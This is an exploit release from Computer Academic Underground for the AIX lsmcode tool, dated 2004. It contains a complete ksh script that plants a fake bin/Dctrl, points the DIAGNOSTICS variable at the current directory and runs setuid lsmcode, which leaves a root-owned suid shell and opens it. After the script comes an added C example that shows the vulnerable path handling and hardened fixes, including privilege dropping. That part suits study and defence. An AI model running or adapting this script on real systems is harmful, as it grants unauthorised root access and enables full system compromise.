                 ____  ____   __   __
                /    \/    \ |  | |  |
    ----====####/ /\__\##/ /\ \##| |##| |####====----
                | |   | |__| | | | | | | |
                | ___ |  __  | | | | |
  ------======######\ \/ /#|  |##|  |#| |##| |######======------
                 \____/ |__| |__| \______/

                     Computer Academic Underground
                        http://www.caughq.org
                             Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2004-0006
Release Date:   2004.12.23
Title:          lsmcode-suidshell.sh
Description:    lsmcode Trusted $PATH SUID Shell Creation
Tested:         lsmcode on AIX 5.1.0
Attributes:     Privileged Access
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2004-0006.txt
Author/Email:   I)ruid
===============/========================================================

Description
===========

This script exploit writes out a simple shell script named 'Dctrl' which
copies ksh, sets its ownership to root, and sets the suid bit on it, thus
creating a suid shell. The exploit then executes 'lsmcode', which runs
our malicious 'Dctrl' without dropping privileges: the directory in which
lsmcode looks for 'bin/Dctrl' is taken from the DIAGNOSTICS environment
variable, which the script points at the current directory, so the
attacker-controlled copy is executed with lsmcode's root privileges.
Afterward it cleans up its mess and executes the suid shell for
convenience.

Notes
=====

This exploit is written assuming your target shell is ksh.

Credits
=======

cees-bart, PhD student @ University of Nijmegen

References
==========

http://www.securityfocus.com/archive/1/384918/2004-12-20/2004-12-26/0
http://www.securityfocus.com/archive/1/385052/2004-12-20/2004-12-26/0

Exploit
=======

#!/usr/bin/ksh
#
# lsmcode-suidshell.sh - I)ruid [CAU] (12.2004)
#
# Exploits AIX's lsmcode tool which does not drop privs prior to
# executing 'Dctrl' via trusted $PATH environment variable.
#

# Stage a fake diagnostics tree. lsmcode looks for bin/Dctrl beneath the
# directory named by $DIAGNOSTICS, so ./bin/Dctrl is what it will run.
# The payload copies ksh and makes the copy a root-owned suid binary.
echo "Creating malicious 'Dctrl'"
mkdir ./bin
cat > ./bin/Dctrl << __EOF__
#!/usr/bin/ksh
cp /usr/bin/ksh ./ksh
chown root:root ./ksh
chmod 4755 ./ksh
__EOF__
chmod 700 ./bin/Dctrl

# Point lsmcode at the current directory instead of the real diagnostics
# tree.
echo "Setting up malicious environment"
export DIAGNOSTICS=.

# lsmcode is setuid root and executes Dctrl with its privileges intact,
# so the payload above runs as root.
echo "Executing /usr/sbin/lsmcode"
/usr/sbin/lsmcode

# Remove the fake tree and the environment override; the suid ksh copy
# itself is left in place.
echo "Cleaning up our mess..."
rm -r ./bin
export DIAGNOSTICS=

echo "Executing suid shell:"
./ksh
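The bug class behind this advisory is a setuid program that builds the path of a helper it executes from an environment variable the unprivileged caller controls, and then runs that helper without dropping privileges. The C below is an added illustration of that pattern and of the two fixes a practitioner would apply; it is not lsmcode's source, and the default directory /usr/lpp/diagnostics, the function names and the uid values used are assumptions made for the example.

```c
/* Added example: environment-controlled helper path in a setuid launcher.
 * Not lsmcode's code; DEFAULT_DIAG_DIR is an assumed default, chosen so
 * the example has something to fall back to. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_DIAG_DIR "/usr/lpp/diagnostics"   /* assumption */
#define HELPER "bin/Dctrl"

/* Vulnerable pattern: $DIAGNOSTICS is trusted unconditionally. With
 * DIAGNOSTICS=. the helper becomes ./bin/Dctrl, a file the caller wrote,
 * and it is executed with the launcher's effective (root) privileges. */
const char *helper_path_vulnerable(const char *diag_env)
{
    static char out[512];
    const char *base = (diag_env && *diag_env) ? diag_env : DEFAULT_DIAG_DIR;
    snprintf(out, sizeof out, "%s/%s", base, HELPER);
    return out;
}

/* Hardened pattern: honour the override only when no privilege boundary is
 * crossed (real uid equals effective uid, i.e. not running setuid) and only
 * when it is an absolute path. Under setuid the compiled-in path is used. */
const char *helper_path_hardened(const char *diag_env, uid_t ruid, uid_t euid)
{
    static char out[512];
    const char *base = DEFAULT_DIAG_DIR;
    if (ruid == euid && diag_env && diag_env[0] == '/')
        base = diag_env;
    snprintf(out, sizeof out, "%s/%s", base, HELPER);
    return out;
}

/* Second fix: permanently drop to the real uid/gid before exec'ing anything
 * whose location or contents the caller can influence. Group first, then
 * user, then verify the drop held; a failed setuid must abort, not continue.
 * Returns 0 on success, -1 if privileges could not be dropped. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    /* if we started non-root, regaining root must now be impossible */
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

int main(void)
{
    const char *env = getenv("DIAGNOSTICS");
    printf("vulnerable would run: %s\n", helper_path_vulnerable(env));
    printf("hardened would run:   %s\n",
           helper_path_hardened(env, getuid(), geteuid()));
    /* A real launcher would call drop_privileges() here, then execve()
     * the hardened path with a sanitised environment. */
    return 0;
}
```

Run it as `DIAGNOSTICS=. ./a.out` to see the two resolutions diverge: the vulnerable resolver yields `./bin/Dctrl`, the hardened one ignores the relative override and stays on the fixed path. Note that neither fix alone is sufficient in practice; the fixed path closes the path-injection, and dropping privileges limits what a still-reachable helper can do.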